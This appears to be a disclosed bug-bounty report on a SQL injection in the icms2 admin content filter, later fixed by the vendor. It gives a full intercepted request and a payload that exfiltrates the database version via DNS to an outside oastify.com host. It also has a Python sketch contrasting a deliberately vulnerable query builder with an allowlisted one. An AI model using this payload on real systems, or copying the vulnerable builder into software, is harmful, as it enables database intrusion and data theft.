SQL Injection Vulnerability in Content Page in instantsoft/icms2

Valid

Reported on

Sep 12th 2023


In the admin Content page, there is a SQL injection vulnerability in the Filter function. To exploit it, an attacker injects SQL into a filter field of the request.

Proof of Concept

1. Log in as admin.

2. Go to "http://127.0.0.1/icms2/admin/content/5". In this case, the number 5 is the content id (it can be changed to any id you have).

3. Click the Filter button, then click the Apply button.

4. Intercept this request:

POST /icms2/admin/content/5/1 HTTP/1.1
Host: 127.0.0.1
Content-Length: 2478
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykAkt8RxbexNHSIRg
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/icms2/admin/content/5
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: icms[62formwidgettemplateoptions]=basic_options; icms[dashboard_chart]=%7B%22c%22%3A%22users%22%2C%22s%22%3A%22reg%22%2C%22i%22%3A%227%3ADAY%22%2C%22t%22%3A%22bar%22%7D; eeb4d5874c6380489fbb8d97b5eb70d5=26u44e1dbns40301ivn5tv8q66; icms[device_type]=desktop; icms[guest_date_log]=1694455424; ICMS64FF53AAE1F09=ltpmbrm096eo0q6p1pb1bn9q4v; icms[content_tree_path]=%2F5.1; icms[introjs_widgets]=1; icms[widgets_tree_path]=%2Fcontent%2Fcontent.163; icms[menu_tree_path]=%2F1.0
Connection: close

------WebKitFormBoundarykAkt8RxbexNHSIRg
Content-Disposition: form-data; name="filter"

page%253d1%2526advanced_filter%253dfilters%255b0%255d%255bfield%255d%253dtitle%2526filters%255b0%255d%255bcondition%255d%253dlk%2526filters%255b0%255d%255bvalue%255d%253daaa%2526filters%255b1%255d%255bfield%255d%253ddate_pub%2526filters%255b1%255d%255bcondition%255d%253deq%2526filters%255b1%255d%255bvalue%255d%253d%2526filters%255b2%255d%255bfield%255d%253duser_id%2526filters%255b2%255d%255bcondition%255d%253deq%2526filters%255b2%255d%255bvalue%255d%253d%2526filters%255b3%255d%255bfield%255d%253dkind%2526filters%255b3%255d%255bcondition%255d%253deq%2526filters%255b3%255d%255bvalue%255d%253d%2526filters%255b4%255d%255bfield%255d%253dsource%2526filters%255b4%255d%255bcondition%255d%253dlk%2526filters%255b4%255d%255bvalue%255d%253d%2526filters%255b5%255d%255bfield%255d%253dteaser%2526filters%255b5%255d%255bcondition%255d%253dlk%2526filters%255b5%255d%255bvalue%255d%253d%2526filters%255b6%255d%255bfield%255d%253dcontent%2526filters%255b6%255d%255bcondition%255d%253dlk%2526filters%255b6%255d%255bvalue%255d%253d%2526filters%255b7%255d%255bfield%255d%253dfeatured%2526filters%255b7%255d%255bcondition%255d%253deq%2526filters%255b7%255d%255bvalue%255d%253d%2526filters%255b8%255d%255bfield%255d%253dnotice%2526filters%255b8%255d%255bcondition%255d%253dlk%2526filters%255b8%255d%255bvalue%255d%253d%2526filters%255b9%255d%255bfield%255d%253drating%2526filters%255b9%255d%255bcondition%255d%253deq%2526filters%255b9%255d%255bvalue%255d%253d%2526filters%255b10%255d%255bfield%255d%253dcomments%2526filters%255b10%255d%255bcondition%255d%253deq%2526filters%255b10%255d%255bvalue%255d%253d%2526filters%255b11%255d%255bfield%255d%253dhits_count%2526filters%255b11%255d%255bcondition%255d%253deq%2526filters%255b11%255d%255bvalue%255d%253d%2526filters%255b12%255d%255bfield%255d%253dis_deleted%2526filters%255b12%255d%255bcondition%255d%253deq%2526filters%255b12%255d%255bvalue%255d%253d%2526perpage%253d30%2526order_by%253ddate_pub%2526order_to%253ddesc
------WebKitFormBoundarykAkt8RxbexNHSIRg
Content-Disposition: form-data; name="visible_columns[]"

date_pub
------WebKitFormBoundarykAkt8RxbexNHSIRg
Content-Disposition: form-data; name="visible_columns[]"

is_approved
------WebKitFormBoundarykAkt8RxbexNHSIRg
Content-Disposition: form-data; name="visible_columns[]"

is_pub
------WebKitFormBoundarykAkt8RxbexNHSIRg
Content-Disposition: form-data; name="visible_columns[]"

user_id
------WebKitFormBoundarykAkt8RxbexNHSIRg--

5. Edit the above request:

Replace the string title with the string load_file(concat('%255c%255c%255c%255c',version(),'.3fjigaetz7srti1dj7q6uw8jaag143ss.oastify.com%255c%255chen')) in the parameter filters%255b0%255d%255bfield%255d%253d, then send it with Repeater. For visualisation, I decode and explain this payload: filters[0][field]=(select load_file(concat('\\\\',version(),'.3fjigaetz7srti1dj7q6uw8jaag143ss.oastify.com\\hen'))) => concat() appends the result of version() to the hostname, and load_file() makes the database server resolve that name, so the version arrives as a DNS query.

6. Result:

At Burp Collaborator, I get the MySQL version number in the DNS record: 10.4.28-MariaDB.3fjigaetz7srti1dj7q6uw8jaag143ss.oastify.com.

7. Video PoC:

a. On the web interface

https://drive.google.com/file/d/1X_7ex2viGIB7AO7j_rCzp2zZdpm8KSvI/view?usp=drive_link

b. Intercept the request and edit it with the payload

https://drive.google.com/file/d/1Svs6VHTJ89gaADCYtKFhnHkIHeSyD8DF/view?usp=drive_link

Impact

This vulnerability allows an attacker to read data from the database, such as passwords, email addresses and other potentially sensitive data.
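The defect class behind this report, as an added example that is not icms2's own code: the double URL-encoded filter blob from step 5 is decoded and split into filters[i][field|condition|value] triples, then turned into a WHERE clause first by interpolating the field name (the shape that lets a field such as (select version()) become SQL) and then with an allowlist of columns and operators and a bound value. The allowlist, the condition map and the sample blob are constructed assumptions for illustration.

```python
import re
from urllib.parse import quote, unquote

# Assumed allowlist (not icms2's own): the PoC's filter columns and its two
# condition codes, eq and lk.
ALLOWED_FIELDS = {"title", "date_pub", "user_id", "kind", "source", "teaser", "content",
                  "featured", "notice", "rating", "comments", "hits_count", "is_deleted"}
CONDITIONS = {"eq": "=", "lk": "LIKE"}

# Constructed blob in the PoC's shape: a query string URL-encoded twice before
# it is placed in the multipart "filter" field.
PLAIN = ("page=1&advanced_filter=filters[0][field]=title&filters[0][condition]=lk"
         "&filters[0][value]=aaa&filters[1][field]=date_pub"
         "&filters[1][condition]=eq&filters[1][value]=&perpage=30")
BENIGN_BLOB = quote(quote(PLAIN, safe=""), safe="")
# The same blob with the field name replaced by an SQL expression, as in step 5.
INJECTED_BLOB = quote(quote(PLAIN.replace("=title&", "=(select version())&", 1),
                            safe=""), safe="")
FILTER_RE = re.compile(r"filters\[(\d+)\]\[(field|condition|value)\]=([^&]*)")

def parse_filters(blob):
    """Decode the blob twice and return the filters[i] triples in index order."""
    found = {}
    for idx, key, val in FILTER_RE.findall(unquote(unquote(blob))):
        found.setdefault(int(idx), {"field": "", "condition": "", "value": ""})[key] = val
    return [found[i] for i in sorted(found)]

def _arg(op, value):
    return f"%{value}%" if op == "LIKE" else value

def build_where_unsafe(filters):
    """Vulnerable shape: the field name is pasted into the SQL text verbatim."""
    active = [f for f in filters if f["value"] != ""]
    ops = [CONDITIONS.get(f["condition"], "=") for f in active]
    sql = " AND ".join(f"{f['field']} {op} %s" for f, op in zip(active, ops))
    return sql, [_arg(op, f["value"]) for f, op in zip(active, ops)]

def build_where_safe(filters):
    """Hardened shape: column and operator from allowlists, value bound as a parameter."""
    parts, args = [], []
    for f in filters:
        if f["value"] == "":
            continue
        if f["field"] not in ALLOWED_FIELDS or f["condition"] not in CONDITIONS:
            raise ValueError(f"rejected filter {f['field']!r} {f['condition']!r}")
        op = CONDITIONS[f["condition"]]
        parts.append(f"`{f['field']}` {op} %s")
        args.append(_arg(op, f["value"]))
    return " AND ".join(parts), args
```

With the injected blob, build_where_unsafe returns the client's expression as the column of the WHERE clause, while build_where_safe rejects it before any SQL is produced.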

Trần Văn Đông modified the report
9 days ago
Fuze validated this vulnerability 9 days ago
Fuze gave praise 9 days ago
Thanks!
Fuze marked this as fixed in 2.16.1 with commit 3a6b14 9 days ago
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Sep 13th 2023
Fuze published this vulnerability 9 days ago
ng`bthg
8 days ago

Awesome!
